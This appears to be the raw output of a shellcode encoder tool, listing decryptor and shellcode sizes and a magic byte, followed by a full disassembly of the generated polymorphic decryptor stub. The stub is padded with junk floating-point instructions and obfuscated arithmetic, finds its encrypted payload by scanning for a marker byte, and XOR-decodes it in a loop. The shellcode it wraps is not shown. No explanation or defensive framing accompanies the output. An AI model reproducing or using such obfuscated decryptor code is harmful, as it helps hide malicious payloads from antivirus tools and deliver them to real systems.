[+] Decryptor body size = 533 bytes [+] Shellcode size = 349 bytes [+] Decryptor + Shellcode size = 882 bytes [+] Magic byte is B7 [+] Crypto steping = 3 byte(s) [+] Pass steping = 2 byte(s) [+] Shellcode dumped to D:\asm\shell.txt.tapion_bin [+] Written 887 bytes [+] Shellcode header stored to D:\asm\shell.txt.tapion_bin.h 00401054 C7C0 095FF064 MOV EAX,64F05F09 0040105A 81FF 3AB15B52 CMP EDI,525BB13A 00401060 9B WAIT 00401061 DBE3 FINIT 00401063 D9F2 FPTAN 00401065 F5 CMC 00401066 DBE2 FCLEX 00401068 0FC8 BSWAP EAX 0040106A 72 05 JB SHORT testsh.00401071 0040106C DEE9 FSUBP ST(1),ST 0040106E F5 CMC 0040106F DEF1 FDIVRP ST(1),ST 00401071 DEF9 FDIVP ST(1),ST 00401073 F5 CMC 00401074 81E8 64F05F09 SUB EAX,95FF064 0040107A FD STD 0040107B C7C6 5E5690C3 MOV ESI,C390565E 00401081 7C 09 JL SHORT testsh.0040108C 00401083 DEF9 FDIVP ST(1),ST 00401085 21F6 AND ESI,ESI 00401087 D9D0 FNOP 00401089 FC CLD 0040108A D9FB FSINCOS 0040108C 09C0 OR EAX,EAX 0040108E 56 PUSH ESI 0040108F F9 STC 00401090 FC CLD 00401091 DEC1 FADDP ST(1),ST 00401093 D9F5 FPREM1 00401095 FD STD 00401096 8BF4 MOV ESI,ESP 00401098 21FF AND EDI,EDI 0040109A FFD6 CALL ESI 0040109C C7C0 A037D043 MOV EAX,43D037A0 004010A2 79 08 JNS SHORT testsh.004010AC 004010A4 21FF AND EDI,EDI 004010A6 09FF OR EDI,EDI 004010A8 F9 STC 004010A9 FC CLD 004010AA DEE9 FSUBP ST(1),ST 004010AC FC CLD 004010AD 81F0 32B78D30 XOR EAX,308DB732 004010B3 E3 03 JECXZ SHORT testsh.004010B8 004010B5 F5 CMC 004010B6 D8D1 FCOM ST(1) 004010B8 09FF OR EDI,EDI 004010BA 81E8 92805D73 SUB EAX,735D8092 004010C0 D9D0 FNOP 004010C2 85DB TEST EBX,EBX 004010C4 09D2 OR EDX,EDX 004010C6 66:C7C0 1EC6 MOV AX,0C61E 004010CB 7D 08 JGE SHORT testsh.004010D5 004010CD 85F6 TEST ESI,ESI 004010CF 3BD8 CMP EBX,EAX 004010D1 D8D1 FCOM ST(1) 004010D3 09D2 OR EDX,EDX 004010D5 D9FD FSCALE 004010D7 D9FE FSIN 004010D9 66:81C0 3F3B ADD AX,3B3F 004010DE DDE9 FUCOMP ST(1) 004010E0 09F6 OR ESI,ESI 004010E2 81FE E5339E46 CMP ESI,469E33E5 004010E8 DEF1 FDIVRP ST(1),ST 004010EA D9F5 FPREM1 004010EC 52 PUSH EDX 004010ED 50 PUSH EAX 004010EE 7B 01 JPO SHORT testsh.004010F1 004010F0 FD STD 004010F1 D9F3 FPATAN 004010F3 0F31 RDTSC 004010F5 C7C7 348A4915 MOV EDI,15498A34 004010FB D9F9 FYL2XP1 004010FD D9E9 FLDL2T 004010FF D9E4 FTST 00401101 81C7 39512007 ADD EDI,7205139 00401107 D9E5 FXAM 00401109 81EF 6DDB691C SUB EDI,1C69DB6D 0040110F E3 07 JECXZ SHORT testsh.00401118 00401111 D9F0 F2XM1 00401113 DAE9 FUCOMPP 00401115 FC CLD 00401116 DDC1 FFREE ST(1) 00401118 D9F1 FYL2X 0040111A 03F8 ADD EDI,EAX 0040111C D8D1 FCOM ST(1) 0040111E 09FF OR EDI,EDI 00401120 0F31 RDTSC 00401122 2BC7 SUB EAX,EDI 00401124 DEE1 FSUBRP ST(1),ST 00401126 DEF9 FDIVP ST(1),ST 00401128 DBE2 FCLEX 0040112A D9E4 FTST 0040112C D9FF FCOS 0040112E 66:33C0 XOR AX,AX 00401131 7B 08 JPO SHORT testsh.0040113B 00401133 D9F9 FYL2XP1 00401135 90 NOP 00401136 DEC1 FADDP ST(1),ST 00401138 D9E4 FTST 0040113A F5 CMC 0040113B 85F6 TEST ESI,ESI 0040113D 81FA A5841311 CMP EDX,111384A5 00401143 03F0 ADD ESI,EAX 00401145 F9 STC 00401146 FC CLD 00401147 DDC1 FFREE ST(1) 00401149 DDC1 FFREE ST(1) 0040114B 58 POP EAX 0040114C 5A POP EDX 0040114D DDD9 FSTP ST(1) 0040114F C7C2 89F81E1A MOV EDX,1A1EF889 00401155 7A 01 JPE SHORT testsh.00401158 00401157 FD STD 00401158 81C2 B0A09F5E ADD EDX,5E9FA0B0 0040115E 85FF TEST EDI,EDI 00401160 D9FA FSQRT 00401162 81EA 3999BE78 SUB EDX,78BE9939 00401168 FC CLD 00401169 DEE9 FSUBP ST(1),ST 0040116B C7C2 5E18D33B MOV EDX,3BD3185E 00401171 D9E9 FLDL2T 00401173 F9 STC 00401174 F7DA NEG EDX 00401176 81C2 5E18D33B ADD EDX,3BD3185E 0040117C 03D6 ADD EDX,ESI 0040117E 3BC6 CMP EAX,ESI 00401180 D9F7 FINCSTP 00401182 DDD9 FSTP ST(1) 00401184 D9E9 FLDL2T 00401186 68 36A0AE6D PUSH 6DAEA036 0040118B 5B POP EBX 0040118C 81EB 0A9DAE6D SUB EBX,6DAE9D0A 00401192 8B3A MOV EDI,DWORD PTR DS:[EDX] 00401194 E3 08 JECXZ SHORT testsh.0040119E 00401196 F5 CMC 00401197 DEE9 FSUBP ST(1),ST 00401199 21F6 AND ESI,ESI 0040119B FD STD 0040119C DEF9 FDIVP ST(1),ST 0040119E DEC9 FMULP ST(1),ST 004011A0 DAE9 FUCOMPP 004011A2 803A B7 CMP BYTE PTR DS:[EDX],0B7 004011A5 DEF9 FDIVP ST(1),ST 004011A7 DDD9 FSTP ST(1) 004011A9 75 48 JNZ SHORT testsh.004011F3 004011AB DBE2 FCLEX 004011AD C7C2 957CD121 MOV EDX,21D17C95 004011B3 F7DA NEG EDX 004011B5 DEE1 FSUBRP ST(1),ST 004011B7 D9FE FSIN 004011B9 D9FA FSQRT 004011BB 81C2 957CD121 ADD EDX,21D17C95 004011C1 D9F6 FDECSTP 004011C3 DDE9 FUCOMP ST(1) 004011C5 D9E0 FCHS 004011C7 DEF1 FDIVRP ST(1),ST 004011C9 DEE9 FSUBP ST(1),ST 004011CB C7C2 5FAED555 MOV EDX,55D5AE5F 004011D1 D9F6 FDECSTP 004011D3 81EA 63AED555 SUB EDX,55D5AE63 004011D9 DEC9 FMULP ST(1),ST 004011DB 42 INC EDX 004011DC D9FD FSCALE 004011DE 42 INC EDX 004011DF D9FF FCOS 004011E1 D9F0 F2XM1 004011E3 DEE9 FSUBP ST(1),ST 004011E5 42 INC EDX 004011E6 42 INC EDX 004011E7 DEE9 FSUBP ST(1),ST 004011E9 D9F9 FYL2XP1 004011EB 03D6 ADD EDX,ESI 004011ED D9E8 FLD1 004011EF D9D0 FNOP 004011F1 D9FF FCOS 004011F3 81EB 41F1372A SUB EBX,2A37F141 004011F9 81C3 41F1372A ADD EBX,2A37F141 004011FF D9EA FLDL2E 00401201 4B DEC EBX 00401202 D9F9 FYL2XP1 00401204 D9E4 FTST 00401206 DEC9 FMULP ST(1),ST 00401208 4B DEC EBX 00401209 3BF3 CMP ESI,EBX 0040120B DDD9 FSTP ST(1) 0040120D D9ED FLDLN2 0040120F 09F6 OR ESI,ESI 00401211 D9D0 FNOP 00401213 4B DEC EBX 00401214 7E 02 JLE SHORT testsh.00401218 00401216 8BFF MOV EDI,EDI 00401218 DEC9 FMULP ST(1),ST 0040121A F9 STC 0040121B 56 PUSH ESI 0040121C FC CLD 0040121D D9F3 FPATAN 0040121F 03F3 ADD ESI,EBX 00401221 75 03 JNZ SHORT testsh.00401226 00401223 3BDA CMP EBX,EDX 00401225 90 NOP 00401226 313E XOR DWORD PTR DS:[ESI],EDI 00401228 8BD2 MOV EDX,EDX 0040122A DEC1 FADDP ST(1),ST 0040122C D9F5 FPREM1 0040122E F9 STC 0040122F 5E POP ESI 00401230 D9FE FSIN 00401232 72 0A JB SHORT testsh.0040123E 00401234 D9E1 FABS 00401236 D8D9 FCOMP ST(1) 00401238 09D2 OR EDX,EDX 0040123A D9F0 F2XM1 0040123C D8D9 FCOMP ST(1) 0040123E D9F8 FPREM 00401240 D9D0 FNOP 00401242 48 DEC EAX 00401243 85FF TEST EDI,EDI 00401245 FC CLD 00401246 DEF1 FDIVRP ST(1),ST 00401248 3BFF CMP EDI,EDI 0040124A F5 CMC 0040124B 48 DEC EAX 0040124C DEF1 FDIVRP ST(1),ST 0040124E 48 DEC EAX 0040124F D9F5 FPREM1 00401251 F5 CMC 00401252 42 INC EDX 00401253 DDE1 FUCOM ST(1) 00401255 FC CLD 00401256 90 NOP 00401257 09C0 OR EAX,EAX 00401259 DEE1 FSUBRP ST(1),ST 0040125B 42 INC EDX 0040125C D8D1 FCOM ST(1) 0040125E FD STD 0040125F 09C0 OR EAX,EAX 00401261 DEF9 FDIVP ST(1),ST 00401263 ^0F8F 29FFFFFF JG testsh.00401192